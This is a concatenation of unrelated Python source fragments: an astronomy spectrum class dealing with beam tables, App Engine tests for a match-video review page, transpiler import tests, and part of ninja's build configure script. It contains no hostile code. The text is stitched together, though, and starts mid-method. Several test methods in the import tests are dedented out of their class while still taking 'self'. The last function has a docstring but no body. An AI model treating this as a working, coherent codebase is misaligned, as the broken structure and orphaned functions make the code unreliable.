        self = super(VaryingResolutionOneDSpectrum, cls).__new__(cls, value, **kwargs)
        assert hasattr(self, '_fill_value')

        # Beams resolution order: explicit argument, then meta, then
        # (optionally) the FITS header.
        if beams is None:
            if "beams" in self.meta:
                beams = self.meta['beams']
            elif read_beam:
                beams = cube_utils.try_load_beams(self.header)
                if beams is None:
                    warnings.warn("Cannot load beams table from header.",
                                  BeamWarning
                                 )

        if beams is not None:
            # Normalize FITS table forms to raw record arrays.
            if isinstance(beams, BinTableHDU):
                beam_data_table = beams.data
            elif isinstance(beams, FITS_rec):
                beam_data_table = beams
            else:
                beam_data_table = None

            if beam_data_table is not None:
                # Convert the FITS beams table into a radio_beam.Beams
                # object, carrying extra columns along as per-row metadata.
                beams = Beams(major=u.Quantity(beam_data_table['BMAJ'], u.arcsec),
                              minor=u.Quantity(beam_data_table['BMIN'], u.arcsec),
                              pa=u.Quantity(beam_data_table['BPA'], u.deg),
                              meta=[{key: row[key] for key in beam_data_table.names
                                     if key not in ('BMAJ','BPA', 'BMIN')}
                                    for row in beam_data_table],)
            self.beams = beams
            self.meta['beams'] = beams

        if goodbeams_mask is not None:
            self.goodbeams_mask = goodbeams_mask

        self._cache = {}

        return self

    @property
    def hdu(self):
        # A single-HDU export necessarily drops the per-channel beams.
        warnings.warn("There are multiple beams for this spectrum that "
                      "are being ignored when creating the HDU.",
                      BeamWarning
                     )
        return super(VaryingResolutionOneDSpectrum, self).hdu

    @property
    def hdulist(self):
        # Primary HDU plus a BEAMS bintable; the single-beam warning from
        # `hdu` is suppressed since the beams ARE preserved here.
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")
            hdu = self.hdu

        beamhdu = cube_utils.beams_to_bintable(self.beams)

        return HDUList([hdu, beamhdu])

    def _new_spectrum_with(self, **kwargs):
        # Default to carrying this spectrum's beams forward.
        beams = kwargs.pop('beams', self.beams)
        if beams is None:
            beams = self.beams
        VRODS = VaryingResolutionOneDSpectrum
        out = super(VRODS, self)._new_spectrum_with(beams=beams,
                                                    **kwargs)
        return out

    def __array_finalize__(self, obj):
        super(VaryingResolutionOneDSpectrum, self).__array_finalize__(obj)
        self._beams = getattr(obj, '_beams', None)
        if getattr(obj, 'goodbeams_mask', None) is not None:
            # do NOT use the setter here, because we sometimes need to write
            # intermediate size-mismatch things that later get fixed, e.g., in
            # __getitem__ below
            self._goodbeams_mask = getattr(obj, 'goodbeams_mask', None)

    def __getitem__(self, key):
        new_qty = super(VaryingResolutionOneDSpectrum, self).__getitem__(key)

        # use the goodbeams_mask setter here because it checks size
        new_qty.goodbeams_mask = self.goodbeams_mask[key]
        new_qty.beams = self.unmasked_beams[key]

        return new_qty
| |
from datetime import datetime
import unittest2
import webapp2
import webtest
from google.appengine.datastore import datastore_stub_util
from google.appengine.ext import ndb
from google.appengine.ext import testbed
from webapp2_extras.routes import RedirectRoute
from consts.account_permissions import AccountPermissions
from consts.district_type import DistrictType
from consts.event_type import EventType
from controllers.suggestions.suggest_match_video_review_controller import \
SuggestMatchVideoReviewController
from helpers.suggestions.suggestion_creator import SuggestionCreator
from models.account import Account
from models.event import Event
from models.match import Match
from models.media import Media
from models.suggestion import Suggestion
class TestSuggestEventWebcastController(unittest2.TestCase):
    # NOTE(review): the class name says "EventWebcast" but these tests
    # exercise the match *video review* controller; consider renaming
    # (kept as-is to avoid breaking test selection by name).

    def loginUser(self):
        """Log a fake, non-admin user into the testbed environment and
        create the matching registered Account."""
        self.testbed.setup_env(
            user_email="user@example.com",
            user_id="123",
            user_is_admin='0',
            overwrite=True)

        self.account = Account.get_or_insert(
            "123",
            email="user@example.com",
            registered=True)
    def givePermission(self):
        """Grant the logged-in account media-review permission."""
        self.account.permissions.append(AccountPermissions.REVIEW_MEDIA)
        self.account.put()

    def createSuggestion(self):
        """Create a pending YouTube match-video suggestion for
        2016necmp_f1m1 and return its Suggestion key name."""
        status = SuggestionCreator.createMatchVideoYouTubeSuggestion(self.account.key,
                                                                    "H-54KMwMKY0",
                                                                    "2016necmp_f1m1")
        self.assertEqual(status, 'success')
        return Suggestion.render_media_key_name(2016, 'match', '2016necmp_f1m1', 'youtube', 'H-54KMwMKY0')
    def setUp(self):
        """Activate the GAE testbed, mount the review route, and seed an
        event with two finals matches (f1m1 and f1m2)."""
        self.policy = datastore_stub_util.PseudoRandomHRConsistencyPolicy(probability=1)
        self.testbed = testbed.Testbed()
        self.testbed.activate()
        self.testbed.init_datastore_v3_stub(consistency_policy=self.policy)
        self.testbed.init_memcache_stub()
        self.testbed.init_user_stub()
        self.testbed.init_urlfetch_stub()
        self.testbed.init_taskqueue_stub(_all_queues_valid=True)
        ndb.get_context().clear_cache()  # Prevent data from leaking between tests

        app = webapp2.WSGIApplication([
            RedirectRoute(r'/suggest/match/video/review', SuggestMatchVideoReviewController, 'suggest-video', strict_slash=True),
        ], debug=True)
        self.testapp = webtest.TestApp(app)

        # The event the suggested videos belong to.
        self.event = Event(
            id="2016necmp",
            name="New England District Championship",
            event_type_enum=EventType.DISTRICT_CMP,
            event_district_enum=DistrictType.NEW_ENGLAND,
            short_name="New England",
            event_short="necmp",
            year=2016,
            end_date=datetime(2016, 03, 27),
            official=False,
            city='Hartford',
            state_prov='CT',
            country='USA',
            venue="Some Venue",
            venue_address="Some Venue, Hartford, CT, USA",
            timezone_id="America/New_York",
            start_date=datetime(2016, 03, 24),
            webcast_json="",
            website="http://www.firstsv.org",
        )
        self.event.put()

        # The match the suggestion targets by default.
        self.match = Match(
            id="2016necmp_f1m1",
            event=ndb.Key(Event, "2016necmp"),
            year=2016,
            comp_level="f",
            set_number=1,
            match_number=1,
            team_key_names=['frc846', 'frc2135', 'frc971', 'frc254', 'frc1678', 'frc973'],
            time=datetime.fromtimestamp(1409527874),
            time_string="4:31 PM",
            tba_videos=[],
            alliances_json='{\
                "blue": {\
                    "score": 270,\
                    "teams": [\
                    "frc846",\
                    "frc2135",\
                    "frc971"]},\
                "red": {\
                    "score": 310,\
                    "teams": [\
                    "frc254",\
                    "frc1678",\
                    "frc973"]}}',
            score_breakdown_json = '{\
                "blue": {\
                    "auto": 70,\
                    "teleop_goal+foul": 40,\
                    "assist": 120,\
                    "truss+catch": 40\
                },"red": {\
                    "auto": 70,\
                    "teleop_goal+foul": 50,\
                    "assist": 150,\
                    "truss+catch": 40}}'
        )
        self.match.put()

        # A second valid match, so a reviewer can retarget a suggestion.
        self.match2 = Match(
            id="2016necmp_f1m2",
            event=ndb.Key(Event, "2016necmp"),
            year=2016,
            comp_level="f",
            set_number=1,
            match_number=2,
            team_key_names=['frc846', 'frc2135', 'frc971', 'frc254', 'frc1678', 'frc973'],
            time=datetime.fromtimestamp(1409527874),
            time_string="4:31 PM",
            tba_videos=[],
            alliances_json='{\
                "blue": {\
                    "score": 270,\
                    "teams": [\
                    "frc846",\
                    "frc2135",\
                    "frc971"]},\
                "red": {\
                    "score": 310,\
                    "teams": [\
                    "frc254",\
                    "frc1678",\
                    "frc973"]}}',
            score_breakdown_json = '{\
                "blue": {\
                    "auto": 70,\
                    "teleop_goal+foul": 40,\
                    "assist": 120,\
                    "truss+catch": 40\
                },"red": {\
                    "auto": 70,\
                    "teleop_goal+foul": 50,\
                    "assist": 150,\
                    "truss+catch": 40}}'
        )
        self.match2.put()
    def tearDown(self):
        """Deactivate the testbed so stubs don't leak between tests."""
        self.testbed.deactivate()

    def getSuggestionForm(self):
        """Fetch the review page and return its 'review_videos' form."""
        response = self.testapp.get('/suggest/match/video/review')
        self.assertEqual(response.status_int, 200)

        form = response.forms.get('review_videos', None)
        self.assertIsNotNone(form)
        return form
    def testLogInRedirect(self):
        """Anonymous users are redirected to the login-required page."""
        response = self.testapp.get('/suggest/match/video/review', status='3*')
        response = response.follow(expect_errors=True)
        self.assertTrue(response.request.path.startswith("/account/login_required"))

    def testNoPermissions(self):
        """Logged-in users without REVIEW_MEDIA are redirected home."""
        self.loginUser()
        response = self.testapp.get('/suggest/match/video/review', status='3*')
        response = response.follow(expect_errors=True)
        self.assertEqual(response.request.path, '/')

    def testNothingToReview(self):
        """The review page renders even with no pending suggestions."""
        self.loginUser()
        self.givePermission()
        response = self.testapp.get('/suggest/match/video/review')
        self.assertEqual(response.status_int, 200)
    def testAcceptSuggestion(self):
        """Accepting a suggestion marks it accepted and attaches the
        video to the originally-suggested match."""
        self.loginUser()
        self.givePermission()
        suggestion_id = self.createSuggestion()
        form = self.getSuggestionForm()
        form.set('accept_keys[]', suggestion_id)
        response = form.submit().follow()
        self.assertEqual(response.status_int, 200)

        # Make sure we mark the Suggestion as REVIEWED
        suggestion = Suggestion.get_by_id(suggestion_id)
        self.assertIsNotNone(suggestion)
        self.assertEqual(suggestion.review_state, Suggestion.REVIEW_ACCEPTED)

        # Make sure the video gets associated
        match = Match.get_by_id(self.match.key_name)
        self.assertIsNotNone(match)
        self.assertIsNotNone(match.youtube_videos)
        self.assertTrue('H-54KMwMKY0' in match.youtube_videos)
    def testAcceptNewKey(self):
        """A reviewer can retarget a suggestion to a different valid match;
        the video attaches there and not to the original match."""
        self.loginUser()
        self.givePermission()
        suggestion_id = self.createSuggestion()
        form = self.getSuggestionForm()
        form.set('accept_keys[]', suggestion_id)
        # Override the target match key before accepting.
        form.set('key-{}'.format(suggestion_id), '2016necmp_f1m2')
        response = form.submit().follow()
        self.assertEqual(response.status_int, 200)

        # Make sure we mark the Suggestion as REVIEWED
        suggestion = Suggestion.get_by_id(suggestion_id)
        self.assertIsNotNone(suggestion)
        self.assertEqual(suggestion.review_state, Suggestion.REVIEW_ACCEPTED)

        # Make sure the video gets associated
        match = Match.get_by_id(self.match2.key_name)
        self.assertIsNotNone(match)
        self.assertIsNotNone(match.youtube_videos)
        self.assertTrue('H-54KMwMKY0' in match.youtube_videos)

        # Make sure we don't add it to the first match
        match = Match.get_by_id(self.match.key_name)
        self.assertIsNotNone(match)
        self.assertIsNotNone(match.youtube_videos)
        self.assertFalse('H-54KMwMKY0' in match.youtube_videos)
    def testAcceptBadKey(self):
        """Retargeting to a nonexistent match leaves the suggestion
        pending and attaches no video."""
        self.loginUser()
        self.givePermission()
        suggestion_id = self.createSuggestion()
        form = self.getSuggestionForm()
        form.set('accept_keys[]', suggestion_id)
        form.set('key-{}'.format(suggestion_id), '2016necmp_f1m3')  # This match doesn't exist
        response = form.submit().follow()
        self.assertEqual(response.status_int, 200)

        # Make sure we don't mark the Suggestion as REVIEWED
        suggestion = Suggestion.get_by_id(suggestion_id)
        self.assertIsNotNone(suggestion)
        self.assertEqual(suggestion.review_state, Suggestion.REVIEW_PENDING)

        # Make sure the video doesn't get associated
        match = Match.get_by_id(self.match.key_name)
        self.assertIsNotNone(match)
        self.assertIsNotNone(match.youtube_videos)
        self.assertFalse('H-54KMwMKY0' in match.youtube_videos)
    def testRejectSuggestion(self):
        """Rejecting a suggestion marks it rejected and attaches no video."""
        self.loginUser()
        self.givePermission()
        suggestion_id = self.createSuggestion()
        form = self.getSuggestionForm()
        form.set('reject_keys[]', suggestion_id)
        response = form.submit().follow()
        self.assertEqual(response.status_int, 200)

        # Make sure we mark the Suggestion as REVIEWED
        suggestion = Suggestion.get_by_id(suggestion_id)
        self.assertIsNotNone(suggestion)
        self.assertEqual(suggestion.review_state, Suggestion.REVIEW_REJECTED)

        # Make sure the video does NOT get associated
        # (comment previously said "gets associated" — copy-paste error)
        match = Match.get_by_id(self.match.key_name)
        self.assertIsNotNone(match)
        self.assertFalse(match.youtube_videos)
| |
import os
from ..utils import TranspileTestCase
class ImportTests(TranspileTestCase):
    """End-to-end tests of the transpiler's import machinery: each test
    compiles and runs a snippet (plus optional extra modules) and compares
    its output with CPython's."""

    def test_import_stdlib_module(self):
        "You can import a Python module implemented in Java (a native stdlib shim)"
        self.assertCodeExecution(
            """
            import time

            time.time()

            print("Done.")
            """)
    def test_import_module(self):
        "You can import a Python module implemented in Python"
        self.assertCodeExecution(
            """
            import example

            example.some_method()

            print("Done.")
            """,
            extra_code={
                'example':
                    """
                    print("Now we're in the example module")

                    def some_method():
                        print("Now we're calling a module method")
                    """
            })

    def test_import_module_main(self):
        "You can import a Python module with if __name__ == '__main__'"
        # The imported module's __main__ guard must NOT fire; the top-level
        # script's guard must.
        self.assertCodeExecution(
            """
            import example

            print('A')

            if __name__ == "__main__":
                print('main')

            print('B')
            """,
            extra_code={
                'example':
                    """
                    print('C')

                    if __name__ == "__main__":
                        print('example main')

                    print('D')
                    """
            })
    def test_multiple_module_import(self):
        "You can import a multiple Python modules implemented in Python"
        self.assertCodeExecution(
            """
            import example, other

            example.some_method()

            other.other_method()

            print("Done.")
            """,
            extra_code={
                'example':
                    """
                    print("Now we're in the example module")

                    def some_method():
                        print("Now we're calling a module method")
                    """,
                'other':
                    """
                    print("Now we're in the other module")

                    def other_method():
                        print("Now we're calling another module method")
                    """
            })
    def test_full_dotted_path(self):
        """`import pkg.mod` runs the package __init__ and exposes the
        fully-qualified name."""
        self.assertCodeExecution(
            """
            import example.submodule

            example.submodule.some_method()

            print("Done.")
            """,
            extra_code={
                'example.__init__':
                    """
                    print("Initializing the example module")
                    """,
                'example.submodule':
                    """
                    print("Now we're in example.submodule")

                    def some_method():
                        print("Now we're calling a submodule method")
                    """
            })

    def test_module_from_dotted_path(self):
        """`from pkg import mod` binds the submodule directly."""
        self.assertCodeExecution(
            """
            from example import submodule

            submodule.some_method()

            print("Done.")
            """,
            extra_code={
                'example.__init__':
                    """
                    print("Initializing the example module")
                    """,
                'example.submodule':
                    """
                    print("Now we're in example.submodule")

                    def some_method():
                        print("Now we're calling a submodule method")
                    """
            })

    def test_symbol_from_dotted_path(self):
        """`from pkg.mod import name` binds a symbol from the submodule."""
        self.assertCodeExecution(
            """
            from example.submodule import some_method

            some_method()

            print("Done.")
            """,
            extra_code={
                'example.__init__':
                    """
                    print("Initializing the example module")
                    """,
                'example.submodule':
                    """
                    print("Now we're in example.submodule")

                    def some_method():
                        print("Now we're calling a submodule method")
                    """
            })
    def test_full_deep_dotted_path(self):
        """Three-level `import pkg.sub.subsub.mod` initializes every
        package __init__ along the path (and only those)."""
        self.assertCodeExecution(
            """
            import example.submodule.subsubmodule.another

            example.submodule.subsubmodule.another.another_method()

            print("Done.")
            """,
            extra_code={
                'example.__init__':
                    """
                    print("Initializing the example module")
                    """,
                'example.submodule.__init__':
                    """
                    print("Now we're in example.submodule.__init__")
                    """,
                'example.submodule.other':
                    """
                    print("Now we're in example.submodule.other")

                    def other_method():
                        print("Now we're calling a submodule method")
                    """,
                'example.submodule.subsubmodule.__init__':
                    """
                    print("Now we're in example.submodule.subsubmodule.__init__")
                    """,
                'example.submodule.subsubmodule.another':
                    """
                    print("Now we're in example.submodule.subsubmodule.another")

                    def another_method():
                        print("Now we're calling a subsubmodule method")
                    """
            })

    def test_module_from_deep_dotted_path(self):
        """`from pkg.sub.subsub import mod` binds the deep submodule."""
        self.assertCodeExecution(
            """
            from example.submodule.subsubmodule import another

            another.another_method()

            print("Done.")
            """,
            extra_code={
                'example.__init__':
                    """
                    print("Initializing the example module")
                    """,
                'example.submodule.__init__':
                    """
                    print("Now we're in example.submodule.__init__")
                    """,
                'example.submodule.other':
                    """
                    print("Now we're in example.submodule.other")

                    def other_method():
                        print("Now we're calling a submodule method")
                    """,
                'example.submodule.subsubmodule.__init__':
                    """
                    print("Now we're in example.submodule.subsubmodule.__init__")
                    """,
                'example.submodule.subsubmodule.another':
                    """
                    print("Now we're in example.submodule.subsubmodule.another")

                    def another_method():
                        print("Now we're calling a subsubmodule method")
                    """
            })

    def test_symbol_from_deep_dotted_path(self):
        """`from pkg.sub.subsub.mod import name` binds the deep symbol."""
        self.assertCodeExecution(
            """
            from example.submodule.subsubmodule.another import another_method

            another_method()

            print("Done.")
            """,
            extra_code={
                'example.__init__':
                    """
                    print("Initializing the example module")
                    """,
                'example.submodule.__init__':
                    """
                    print("Now we're in example.submodule.__init__")
                    """,
                'example.submodule.other':
                    """
                    print("Now we're in example.submodule.other")

                    def other_method():
                        print("Now we're calling a submodule method")
                    """,
                'example.submodule.subsubmodule.__init__':
                    """
                    print("Now we're in example.submodule.subsubmodule.__init__")
                    """,
                'example.submodule.subsubmodule.another':
                    """
                    print("Now we're in example.submodule.subsubmodule.another")

                    def another_method():
                        print("Now we're calling a subsubmodule method")
                    """
            })
    def test_symbol_import(self):
        """`from module import name` binds a single symbol."""
        self.assertCodeExecution(
            """
            from example import some_method

            some_method()

            print("Done.")
            """,
            extra_code={
                'example':
                    """
                    print("Now we're in the example module")

                    def some_method():
                        print("Now we're calling a module method")
                    """
            })

    def test_multiple_symbol_import(self):
        """Only the named symbols are bound; unimported names raise
        NameError."""
        self.assertCodeExecution(
            """
            from example import some_method, other_method

            print("Call some method...")
            some_method()

            print("Call another method...")
            other_method()

            try:
                print("But this will fail...")
                third_method()
            except NameError:
                print("Which it does.")

            print("Done.")
            """,
            extra_code={
                'example':
                    """
                    print("Now we're in the example module")

                    def some_method():
                        print("Now we're calling a module method")

                    def other_method():
                        print("Now we're calling another module method")

                    def third_method():
                        print("This shouldn't be called")
                    """
            })
    def test_import_star(self):
        """`from module import *` without __all__ binds every public name.
        Run at module level — star-import is illegal inside a function."""
        self.assertCodeExecution(
            """
            from example import *

            print("Call some method...")
            some_method()

            print("Call another method...")
            other_method()

            print("Call a third method...")
            third_method()

            print("Done.")
            """,
            extra_code={
                'example':
                    """
                    print("Now we're in the example module")

                    def some_method():
                        print("Now we're calling a module method")

                    def other_method():
                        print("Now we're calling another module method")

                    def third_method():
                        print("Now we're calling a third module method")
                    """
            }, run_in_function=False)

    def test_import_star_with_all(self):
        """`from module import *` honors __all__: names outside it stay
        unbound and raise NameError."""
        self.assertCodeExecution(
            """
            from example import *

            print("Call some method...")
            some_method()

            print("Call another method...")
            other_method()

            try:
                print("But this will fail...")
                third_method()
            except NameError:
                print("Which it does.")

            print("Done.")
            """,
            extra_code={
                'example':
                    """
                    __all__ = ['some_method', 'other_method']

                    print("Now we're in the example module")

                    def some_method():
                        print("Now we're calling a module method")

                    def other_method():
                        print("Now we're calling another module method")

                    def third_method():
                        print("This shouldn't be called")
                    """
            }, run_in_function=False)
    def test_import_from_dot(self):
        """A submodule can use `from . import sibling` to reach a sibling
        in the same package."""
        self.assertCodeExecution(
            """
            from example import submodule2

            submodule2.method()

            print("Done.")
            """,
            extra_code={
                'example.__init__':
                    """
                    """,
                'example.submodule1':
                    """
                    def method():
                        print("Calling method in submodule1")
                    """,
                'example.submodule2':
                    """
                    from . import submodule1

                    def method():
                        print("Calling method in submodule2")
                        submodule1.method()
                    """,
            })

    def test_import_from_local_dot(self):
        """A package __init__ can re-export symbols pulled from its own
        modules via `from .mod import name`."""
        self.assertCodeExecution(
            """
            from submodule import method1, method2

            method1()
            method2()

            print("Done.")
            """,
            extra_code={
                'submodule.__init__':
                    """
                    print("in submodule/__init__.py")
                    from .modulea import method2

                    def method1():
                        print("Calling method in submodule.__init__")
                    """,
                'submodule.modulea':
                    """
                    print("in submodule/modulea.py")

                    def method2():
                        print("Calling method in submodule.modulea")
                    """,
            })
def test_import_from_local_dot_sibling(self):
    """A module can import from a sibling module of the same package
    with an explicit relative import."""
    self.assertCodeExecution(
        """
from submodule.moduleb import method3, method2
method3()
method2()
print("Done.")
""",
        extra_code={
            'submodule.__init__':
            """
print("in submodule/__init__.py")
def method1():
    print("Calling method1 in submodule.__init__")
""",
            'submodule.modulea':
            """
print("in submodule/modulea.py")
def method2():
    print("Calling method2 in submodule.modulea")
""",
            'submodule.moduleb':
            """
print("in submodule/moduleb.py")
from .modulea import method2
def method3():
    print("Calling method3 in submodule.moduleb")
""",
        })
def test_import_from_local_dot_deep(self):
    """Relative imports chain through nested subpackages so the top
    package can expose names from two levels down."""
    self.assertCodeExecution(
        """
from submodule import method1, method2, method3, method4
method1()
method2()
method3()
method4()
print("Done.")
""",
        extra_code={
            'submodule.__init__':
            """
print("in submodule/__init__.py")
from .modulea import method2
from .subsubmodule import method3, method4
def method1():
    print("Calling method1 in submodule.__init__")
""",
            'submodule.modulea':
            """
print("in submodule/modulea.py")
def method2():
    print("Calling method2 in submodule.modulea")
""",
            'submodule.subsubmodule.__init__':
            """
print("in submodule/subsubmodule/__init__.py")
from .submodulea import method4
def method3():
    print("Calling method3 in submodule.subsubmodule.__init__")
""",
            'submodule.subsubmodule.submodulea':
            """
print("in submodule/subsubmodule/submodulea.py")
def method4():
    print("Calling method4 in submodule.subsubmodule.submodula")
""",
        })
def test_import_from_deep_upstream(self):
    """`from .. import x` forms resolve upward from a deeply nested
    module, covering module, attribute and subpackage targets."""
    self.assertCodeExecution(
        """
from submodule.subsubmodule.submodulea import method
method()
print("Done.")
""",
        extra_code={
            'submodule.__init__':
            """
print("in submodule/__init__.py")
def method1():
    print("Calling method in submodule.__init__")
""",
            'submodule.modulea':
            """
print("in submodule/modulea.py")
def method2():
    print("Calling method in submodule.modulea")
""",
            'submodule.moduleb':
            """
print("in submodule/moduleb.py")
def method3():
    print("Calling method in submodule.moduleb")
""",
            'submodule.modulec':
            """
print("in submodule/modulec.py")
def method4():
    print("Calling method in submodule.modulec")
""",
            'submodule.moduled.__init__':
            """
print("in submodule/moduled/__init__.py")
def method5():
    print("Calling method in submodule.moduled")
""",
            'submodule.moduled.submoduled':
            """
print("in submodule/moduled/submoduled.py")
def method6():
    print("Calling method in submodule.moduled.submoduled")
""",
            'submodule.subsubmodule.__init__':
            """
print("in submodule/subsubmodule/__init__.py")
def method7():
    print("Calling method in submodule.subsubmodule.__init__")
""",
            'submodule.subsubmodule.submodulea':
            """
print("in submodule/subsubmodule/submodulea.py")
from .. import moduleb
from ..modulec import method4
from ..moduled import method5, submoduled
def method():
    print("Calling method4 in submodule.subsubmodule.submodulea")
    moduleb.method3()
    method4()
    method5()
    submoduled.method6()
""",
        })
class NativeImportTests(TranspileTestCase):
    """Importing native Java packages and classes through Python import
    syntax; expected output is compared against the JVM run."""

    def test_import_java_module_static_method(self):
        "You can invoke a static method from a native Java namespace"
        self.assertJavaExecution(
            """
from java import lang
props = lang.System.getProperties()
print(props.get("file.separator"))
print("Done.")
""",
            """
%s
Done.
""" % os.path.sep)

    def test_import_java_class_static_method(self):
        "You can invoke a static method from a native Java class"
        self.assertJavaExecution(
            """
from java.lang import System
props = System.getProperties()
print(props.get("file.separator"))
print("Done.")
""",
            """
%s
Done.
""" % os.path.sep)

    def test_import_java_module(self):
        "You can import a native Java namespace as a Python module"
        self.assertJavaExecution(
            """
from java import lang
buf = lang.StringBuilder()
buf.append('Hello, ')
buf.append('World')
print(buf.toString())
print("Done.")
""",
            """
Hello, World
Done.
""")

    def test_import_java_class(self):
        "You can import a native Java class as a Python module"
        self.assertJavaExecution(
            """
from java.lang import StringBuilder
buf = StringBuilder()
buf.append('Hello, ')
buf.append('World')
print(buf.toString())
print("Done.")
""",
            """
Hello, World
Done.
""")
class BuiltinsImportTests(TranspileTestCase):
    """The builtins module is importable like any other module, both
    whole and via from-import (with and without aliasing)."""

    def test_import_builtins(self):
        """import builtins, then access a builtin as an attribute."""
        self.assertCodeExecution("""
import builtins
print(builtins.abs(-42))
print("Done")
""")

    def test_import_from_builtins(self):
        """from builtins import a single name."""
        self.assertCodeExecution("""
from builtins import abs
print(abs(-42))
print("Done")
""")

    def test_import_from_builtins_as(self):
        """from builtins import a name under an alias."""
        self.assertCodeExecution("""
from builtins import abs as _abs
print(_abs(-42))
print("Done")
""")
| |
#!/usr/bin/env python
#
# Copyright 2001 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Script that generates the build.ninja for ninja itself.
Projects that use ninja themselves should either write a similar script
or use a meta-build system that supports Ninja output."""
from optparse import OptionParser
import os
import sys
sys.path.insert(0, 'misc')
import ninja_syntax
# Command-line interface of the configure script.
parser = OptionParser()
platforms = ['linux', 'freebsd', 'mingw', 'windows']
profilers = ['gmon', 'pprof']
parser.add_option('--platform',
                  help='target platform (' + '/'.join(platforms) + ')',
                  choices=platforms)
parser.add_option('--host',
                  help='host platform (' + '/'.join(platforms) + ')',
                  choices=platforms)
parser.add_option('--debug', action='store_true',
                  help='enable debugging extras',)
parser.add_option('--profile', metavar='TYPE',
                  choices=profilers,
                  help='enable profiling (' + '/'.join(profilers) + ')',)
parser.add_option('--with-gtest', metavar='PATH',
                  help='use gtest unpacked in directory PATH')
parser.add_option('--with-python', metavar='EXE',
                  help='use EXE as the Python interpreter',
                  default=os.path.basename(sys.executable))
parser.add_option('--with-msvc-helper', metavar='NAME',
                  help="name for ninja-msvc-helper binary (MSVC only)")
(options, args) = parser.parse_args()
if args:
    print 'ERROR: extra unparsed command-line arguments:', args
    sys.exit(1)

# When --platform is omitted, canonicalize sys.platform spellings
# (e.g. 'linux2', 'win32') to our platform names.
platform = options.platform
if platform is None:
    platform = sys.platform
    if platform.startswith('linux'):
        platform = 'linux'
    elif platform.startswith('freebsd'):
        platform = 'freebsd'
    elif platform.startswith('mingw'):
        platform = 'mingw'
    elif platform.startswith('win'):
        platform = 'windows'
# The build host defaults to the target platform (non-cross build).
host = options.host or platform

BUILD_FILENAME = 'build.ninja'
buildfile = open(BUILD_FILENAME, 'w')
n = ninja_syntax.Writer(buildfile)
n.comment('This file is used to build ninja itself.')
n.comment('It is generated by ' + os.path.basename(__file__) + '.')
n.newline()

n.comment('The arguments passed to configure.py, for rerunning it.')
n.variable('configure_args', ' '.join(sys.argv[1:]))
# Only whitelisted environment variables are forwarded into the build.
env_keys = set(['CXX', 'AR', 'CFLAGS', 'LDFLAGS'])
configure_env = dict((k, os.environ[k]) for k in os.environ if k in env_keys)
if configure_env:
    config_str = ' '.join([k + '=' + configure_env[k] for k in configure_env])
    n.variable('configure_env', config_str + '$ ')
n.newline()

# Compiler selection: MSVC's cl on Windows, g++ (or $CXX) elsewhere.
CXX = configure_env.get('CXX', 'g++')
objext = '.o'
if platform == 'windows':
    CXX = 'cl'
    objext = '.obj'
def src(filename):
    """Return the path of *filename* inside the src/ directory."""
    path = os.path.join('src', filename)
    return path
def built(filename):
    """Return the path of *filename* inside the $builddir directory."""
    path = os.path.join('$builddir', filename)
    return path
def doc(filename):
    """Return the path of *filename* inside the doc/ directory."""
    path = os.path.join('doc', filename)
    return path
def cc(name, **kwargs):
    """Emit a build edge compiling C source src/<name>.c into the build dir.

    Uses the 'cxx' rule (MSVC compiles .c with the same driver); extra
    keyword arguments are forwarded to the ninja writer.
    """
    obj = built(name + objext)
    source = src(name + '.c')
    return n.build(obj, 'cxx', source, **kwargs)
def cxx(name, **kwargs):
    """Emit a build edge compiling C++ source src/<name>.cc into the
    build dir; extra keyword arguments are forwarded to the writer."""
    obj = built(name + objext)
    source = src(name + '.cc')
    return n.build(obj, 'cxx', source, **kwargs)
def binary(name):
    """Return the executable filename for *name* on this platform.

    On Windows-family platforms the real output is <name>.exe and a
    phony alias named <name> is emitted so `ninja name` still works.
    """
    if platform not in ('mingw', 'windows'):
        return name
    exe = name + '.exe'
    n.build(name, 'phony', exe)
    return exe
# Global variables plus per-platform compiler and linker flag sets.
n.variable('builddir', 'build')
n.variable('cxx', CXX)
if platform == 'windows':
    n.variable('ar', 'link')
else:
    n.variable('ar', configure_env.get('AR', 'ar'))

if platform == 'windows':
    cflags = ['/nologo',  # Don't print startup banner.
              '/Zi',  # Create pdb with debug info.
              '/W4',  # Highest warning level.
              '/WX',  # Warnings as errors.
              '/wd4530', '/wd4100', '/wd4706',
              '/wd4512', '/wd4800', '/wd4702', '/wd4819',
              '/GR-',  # Disable RTTI.
              # Disable size_t -> int truncation warning.
              # We never have strings or arrays larger than 2**31.
              '/wd4267',
              '/DNOMINMAX', '/D_CRT_SECURE_NO_WARNINGS',
              '/DNINJA_PYTHON="%s"' % options.with_python]
    ldflags = ['/DEBUG', '/libpath:$builddir']
    if not options.debug:
        cflags += ['/Ox', '/DNDEBUG', '/GL']
        ldflags += ['/LTCG', '/OPT:REF', '/OPT:ICF']
else:
    cflags = ['-g', '-Wall', '-Wextra',
              '-Wno-deprecated',
              '-Wno-unused-parameter',
              '-fno-rtti',
              '-fno-exceptions',
              '-fvisibility=hidden', '-pipe',
              '-DNINJA_PYTHON="%s"' % options.with_python]
    if options.debug:
        cflags += ['-D_GLIBCXX_DEBUG', '-D_GLIBCXX_DEBUG_PEDANTIC']
    else:
        cflags += ['-O2', '-DNDEBUG']
    if 'clang' in os.path.basename(CXX):
        cflags += ['-fcolor-diagnostics']
    if platform == 'mingw':
        cflags += ['-D_WIN32_WINNT=0x0501']
    ldflags = ['-L$builddir']
libs = []

# Per-platform adjustments to the generic flag sets above.
if platform == 'mingw':
    cflags.remove('-fvisibility=hidden');
    ldflags.append('-static')
elif platform == 'sunos5':
    cflags.remove('-fvisibility=hidden')
elif platform == 'windows':
    pass
else:
    # Profiling is only supported on the plain POSIX toolchains.
    if options.profile == 'gmon':
        cflags.append('-pg')
        ldflags.append('-pg')
    elif options.profile == 'pprof':
        libs.append('-lprofiler')
def shell_escape(arg):
    """Escape *arg* so the shell interprets it as a single argument.

    This isn't a complete quoter -- it's just enough to make
    NINJA_PYTHON work: values containing double quotes get wrapped in
    single quotes (with embedded single quotes backslash-escaped).
    On Windows/MinGW the value passes through untouched since the flag
    syntax differs there.

    Note: values containing only single quotes or spaces are returned
    unquoted, matching historical behavior.
    """
    # The original parameter was named `str`, shadowing the builtin;
    # renamed (positional callers are unaffected).
